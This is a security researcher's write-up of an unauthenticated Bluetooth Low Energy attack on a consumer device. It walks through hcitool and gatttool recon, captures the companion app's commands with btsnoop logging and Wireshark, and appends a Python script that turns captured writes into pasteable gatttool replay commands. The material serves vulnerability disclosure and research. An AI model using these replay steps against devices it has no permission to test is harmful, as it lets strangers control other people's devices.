This post is not about bounty tricks; it is based on a CVE I received this year for a product.
In our daily lives we use Bluetooth to connect headphones, mice, smartwatches and so on, but have you ever thought of hunting for bugs in such a device?
What if you could connect to the device without pairing it with your phone and trigger any action you like? :D Sounds interesting, right? 😉
So let's start and see how I controlled the device from my terminal.
Okay!! To perform a BLE attack you need a few tools:
· A CSR Bluetooth 4.0 or 5.0 USB dongle (pick the one matching the Bluetooth version the target runs; in my case it was 4.0)
· An Android phone, of course
· The target device itself
In the very first phase we do some recon to identify the target's BLE address. hci1 below is the CSR dongle; if it is the only adapter on the box it will be hci0 (check with hciconfig), and lescan normally needs root.
Command: hcitool -i hci1 lescan
Once we have the address we can connect to the device with gatttool in interactive mode (-i selects the adapter, -I opens the interactive shell; type connect at the [LE]> prompt, which succeeds without any pairing as long as the device does not require an encrypted link):
Command: gatttool -i hci1 -b <ble address> -I
Now, to list the services with their attribute group handle ranges and UUIDs:
Command: primary
In the screenshot above, each line gives a service's start/end handles and its UUID. The 16-bit UUIDs are the standard SIG-defined services: 0x1800 is Generic Access (device name, appearance, etc.) and 0x1801 is Generic Attribute; anything else is vendor-specific and is where the interesting functionality usually lives.
To enumerate the characteristics and descriptors, along with the handle of each, use
Command: char-desc

Now that we have gathered a lot of information, it's time to play with the device.
While connected to the device, I opened the Android mobile application and toggled the device ON and OFF. With Bluetooth HCI snoop logging enabled in the phone's Developer options, all of these interactions get recorded in the btsnoop log file.
Once you have pulled the log file, btsnoop_hci.log, from the phone, open it in Wireshark and apply the filter btatt to find the Write Command (ATT opcode 0x52; btatt.opcode == 0x52 narrows it further) carrying the handle and value shown in the screenshot.
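As an added example (not code from the original post), the following Python script does offline what the Wireshark step above does by hand: it parses an Android btsnoop_hci.log (H4 framing), walks HCI ACL → L2CAP → ATT, keeps only Write Request / Write Command PDUs, and prints each one as the gatttool command that replays it from the interactive session described earlier. The sample log is constructed inline, so the handles (0x000e, 0x000f) and values in it are assumptions for illustration, not the real device's; point main() at your own btsnoop_hci.log for real data. ACL fragment reassembly is deliberately not implemented, since ATT writes to a BLE peripheral normally fit in a single ACL packet.

```python
"""Extract ATT writes from an Android btsnoop_hci.log and print gatttool replay commands."""
from __future__ import annotations
import struct
import sys
from dataclasses import dataclass

BTSNOOP_MAGIC = b"btsnoop\x00"
BTSNOOP_DLT_H4 = 1002      # datalink type Android writes (HCI UART/H4 framing)
H4_ACL = 0x02              # H4 packet indicator for ACL data
L2CAP_CID_ATT = 0x0004     # fixed L2CAP channel used by ATT
ATT_WRITE_REQ = 0x12
ATT_WRITE_CMD = 0x52


@dataclass
class AttWrite:
    opcode: int
    handle: int
    value: bytes
    sent_by_host: bool     # True = phone -> device (btsnoop flags bit 0 clear)

    def gatttool_command(self) -> str:
        # Write Request expects a response (char-write-req); Write Command does not (char-write-cmd)
        verb = "char-write-req" if self.opcode == ATT_WRITE_REQ else "char-write-cmd"
        return f"{verb} 0x{self.handle:04x} {self.value.hex()}"


def iter_btsnoop_records(data: bytes):
    """Yield (flags, packet_bytes) for each record; header fields are big-endian."""
    if data[:8] != BTSNOOP_MAGIC:
        raise ValueError("not a btsnoop file")
    version, datalink = struct.unpack(">II", data[8:16])
    if version != 1 or datalink != BTSNOOP_DLT_H4:
        raise ValueError(f"unsupported btsnoop version/datalink {version}/{datalink}")
    off = 16
    while off + 24 <= len(data):
        _orig_len, incl_len, flags, _drops, _ts_us = struct.unpack(">IIIIq", data[off:off + 24])
        off += 24
        yield flags, data[off:off + incl_len]
        off += incl_len


def extract_att_writes(data: bytes) -> list[AttWrite]:
    writes = []
    for flags, pkt in iter_btsnoop_records(data):
        if len(pkt) < 5 or pkt[0] != H4_ACL:
            continue                                   # skip HCI commands/events, SCO, etc.
        handle_flags, acl_len = struct.unpack_from("<HH", pkt, 1)
        if (handle_flags >> 12) & 0b11 == 0b01:
            continue                                   # continuation fragment: no reassembly here
        acl = pkt[5:5 + acl_len]
        if len(acl) < 4:
            continue
        l2cap_len, cid = struct.unpack_from("<HH", acl, 0)
        if cid != L2CAP_CID_ATT:
            continue
        att = acl[4:4 + l2cap_len]
        if len(att) < 3 or att[0] not in (ATT_WRITE_REQ, ATT_WRITE_CMD):
            continue
        handle = struct.unpack_from("<H", att, 1)[0]
        writes.append(AttWrite(att[0], handle, bytes(att[3:]), sent_by_host=(flags & 1) == 0))
    return writes


# ---- constructed sample log (assumed handles/values, not from the real device) ----
def _h4_acl_att(att_pdu: bytes, conn_handle: int = 0x0040) -> bytes:
    l2cap = struct.pack("<HH", len(att_pdu), L2CAP_CID_ATT) + att_pdu
    acl = struct.pack("<HH", conn_handle | (0b10 << 12), len(l2cap)) + l2cap  # PB=first packet
    return bytes([H4_ACL]) + acl


def _record(pkt: bytes, flags: int, ts_us: int) -> bytes:
    return struct.pack(">IIIIq", len(pkt), len(pkt), flags, 0, ts_us) + pkt


def build_sample_log() -> bytes:
    """Simulates: app enables notifications, writes ON, device notifies, app writes OFF."""
    le_scan_enable_cmd = bytes([0x01]) + struct.pack("<HB", 0x200C, 2) + b"\x01\x00"  # HCI command
    records = [
        _record(le_scan_enable_cmd, 2, 1000),                                        # flags bit1: command
        _record(_h4_acl_att(bytes([ATT_WRITE_REQ]) + struct.pack("<H", 0x000F) + b"\x01\x00"), 0, 2000),  # CCCD
        _record(_h4_acl_att(bytes([ATT_WRITE_CMD]) + struct.pack("<H", 0x000E) + b"\x01"), 0, 3000),      # ON
        _record(_h4_acl_att(bytes([0x1B]) + struct.pack("<H", 0x0010) + b"\x01"), 1, 4000),               # notification
        _record(_h4_acl_att(bytes([ATT_WRITE_CMD]) + struct.pack("<H", 0x000E) + b"\x00"), 0, 5000),      # OFF
    ]
    return BTSNOOP_MAGIC + struct.pack(">II", 1, BTSNOOP_DLT_H4) + b"".join(records)


def main() -> None:
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_log()
    for w in extract_att_writes(data):
        direction = "host->device" if w.sent_by_host else "device->host"
        print(f"{direction}  {w.gatttool_command()}")


if __name__ == "__main__":
    main()
```

Run it as `python3 att_writes.py btsnoop_hci.log`; each printed line can be pasted straight into the gatttool [LE]> prompt after connect. Handles are per-device and can change if the peripheral's GATT table is updated, so re-run char-desc on the target before trusting a handle taken from an old capture.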
